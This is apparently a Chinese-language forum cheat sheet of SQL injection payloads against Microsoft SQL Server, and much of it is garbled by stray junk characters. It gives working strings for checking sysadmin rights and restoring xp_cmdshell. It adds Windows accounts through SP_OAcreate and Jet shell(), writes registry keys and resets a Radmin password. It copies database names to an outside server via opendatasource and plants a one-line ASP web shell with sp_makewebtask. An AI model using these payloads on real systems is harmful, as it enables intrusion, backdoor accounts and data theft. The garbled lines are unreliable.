常用的一些注入命令

admin

//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
4 |6 {6 g+ a7 L6 [6 ]
//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
) @$ u2 L% T) A7 A) t

数字类型
/ W( X) h+ R4 D0 |  aand char(124)%2Buser%2Bchar(124)=0

1 u7 {! L1 }- F6 C* h/ W4 A. m* }字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

1 y, Z% a0 D1 b5 z: Z# m爆用户名
and user>0
' l" k# m3 O0 h4 }' and user>0 and ''='

检测是否为SA权限
1 @& O3 U, T' B' @3 oand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
; v+ l# K, z5 L
+ W0 k4 [# o& r! a" [检测是不是MSSQL数据库
8 s4 k4 ]7 K* R6 n2 _7 j4 ^and exists (select * from sysobjects);--

; Z# A8 Y: I* B8 F: c3 b检测是否支持多行
  {/ ~' w$ i3 Z' [/ t3 N;declare @d int;--
+ L* G1 ~2 L  ]' T) f! e% l
* W5 G' r% Z! F. v- v3 R恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
/ P$ S7 q* U/ S# N( G

9 D! u9 i/ Z6 V9 ^' T, \select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
6 Q2 n* Y! d) T; ^" r. p/ h
- J, {: l/ g$ I6 m  M//-----------------------
6 r) a; Y& I2 K0 @! o//       执行命令
1 G) @7 J8 |' c6 l, _6 w& ], U//-----------------------
- s( ?7 X' k4 H2 r/ N9 m$ @首先开启沙盘模式：
& {5 S2 Z% n+ L2 I1 Z3 p. |exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

/ N0 a% H2 d. V然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

/ F! @1 c: `1 U2 P3 H执行命令
& R! M6 R2 v8 G;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
* m0 M7 r2 }' V! Q  h% P
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
' M/ ?' L5 q0 n' Z9 S
: Y  S& C+ B8 p# b: ?. x- l判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
: |/ C  {  x9 J" N8 G2 {
写注册表
0 y0 [3 ~6 F8 a9 M( O( C8 Oexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
, R- B1 C. ^( o, C/ p
REG_SZ
5 e3 e  G! }/ W( |$ q. I
, B) i5 J. M2 c1 @$ r1 g读注册表
9 t! l  ?0 G# I* _: J' h3 d* |exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
/ h% @' m0 `  w' `
9 a% P. X5 C3 L& @. D读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1


! \( W0 i; ?: U+ _) `2 R/ d& n数据库备份
backup database pubs to disk = 'c:\123.bak'

//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--



3 g  _6 {( @$ e" c# z$ d更改sa口令方法：用sql综合利用工具连接后，执行命令：
' B! M% Z- e: S# _. Qexec sp_password NULL,'新密码','sa'

添加和删除一个SA权限的用户test：
+ \; q* }3 @( n( a0 Nexec master.dbo.sp_addlogin test,9530772
! ~0 A% @8 j  L  t+ Y+ {! Hexec master.dbo.sp_addsrvrolemember test,sysadmin

. N; ~$ Q5 P( J' |" w0 g$ _" O删除扩展存储过过程xp_cmdshell的语句:
6 e' Z5 h8 ~2 |- ?exec sp_dropextendedproc 'xp_cmdshell'

添加扩展存储过过程
; h8 x4 d# v7 o$ vEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public
2 \. ]: D% D: K$ `# k
! `/ ?$ F, R$ W. w
* @7 n/ q; Y& ^停掉或激活某个服务。

- V9 X( J2 G' gexec master..xp_servicecontrol 'stop','schedule'
7 M0 l6 m3 A! I/ q3 j: l$ bexec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs
$ p$ D! G0 _, e6 h- R  S
) G) s6 J6 w( t$ M% W7 f+ a只列某个目录下的子目录。
, S$ F: I4 A! Q  b! dxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

; O9 ^/ C1 u+ X2 t3 l/ P8 Gdbo.xp_makecab
# i- y+ T2 c1 |; Q$ g9 ~. Z
% q: [( O! X& ]6 `; B9 ]$ ~将目标多个档案压缩到某个目标档案之内。
: j& y0 |! B1 A0 `所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。
1 |7 @0 }- d- w
! J; ]6 l; n  F% s5 H1 ?2 A4 idbo.xp_makecab
# d# G* B+ t& q" b'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
7 Z6 `0 g" Z2 q" h'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
1 d9 J3 ]- k) T1 h
, h+ z" n3 F* i2 ?4 H/ {xp_terminate_process

- \) y8 {3 W* S! h: u停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

" E2 C) d& r+ ~) Pxp_terminate_process 2484

$ K) d! R) q+ e8 Cxp_unpackcab
( g$ t: Y6 r0 A; k% E$ ~
1 Z4 }( h2 P; G" n/ p; ]* z解开压缩档。

# h1 a& x" K0 K8 oxp_unpackcab 'c:\test.cab','c:\temp',1
/ _" [# h2 n  V+ t7 I% `/ s

  g( W& V' b( c! i) @7 ]某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
6 l0 m8 l6 s& i
create database lcx;
6 J+ A9 u( X( vCreate TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

% j6 J* e: j! |
4 \0 w: h$ Q: y3 {) J//在Master中创建表，看看权限怎样
) |$ N' O, L. \7 \0 R# W0 {Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

5 X+ h8 _0 j& C" B用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
/ P3 D* V! ?. q0 H' ~
" O! Z5 ?! V) I; U/ B# B# N4 k1 w//更新表内容
; D. [- {& _0 ~( ]% k* WUpdate films SET kind = 'Dramatic' Where id = 123
4 `" @" t* p8 v+ ?+ L
//删除内容
4 {4 g: t6 c6 X' s4 X0 y. Xdelete from table_name where Stockid = 3